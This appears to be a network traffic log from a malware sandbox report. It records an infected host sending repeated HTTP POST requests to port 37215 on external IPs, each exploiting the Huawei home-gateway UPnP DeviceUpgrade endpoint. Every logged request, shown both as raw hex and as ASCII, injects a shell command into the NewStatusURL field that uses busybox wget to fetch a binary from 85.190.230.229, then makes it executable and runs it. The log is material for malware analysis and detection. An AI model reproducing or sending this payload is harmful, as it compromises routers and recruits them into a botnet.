                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.050054073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.294084072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802170992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794025898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746088982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681752920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      84192.168.2.1453978156.7.249.20137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.977889061 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      85192.168.2.144180841.33.155.13237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.979235888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.310089111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802170992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
